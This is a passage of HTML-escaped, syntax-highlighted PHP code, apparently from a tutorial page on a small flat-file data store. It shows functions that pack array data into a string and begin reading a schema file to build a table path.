class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;ARR&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-163&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbPack&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-164&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-165&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-166&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-167&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-168&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbGetPath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-169&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$schema&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;SCHEMA&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-170&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$schema&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-171&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$schema&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-172&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span 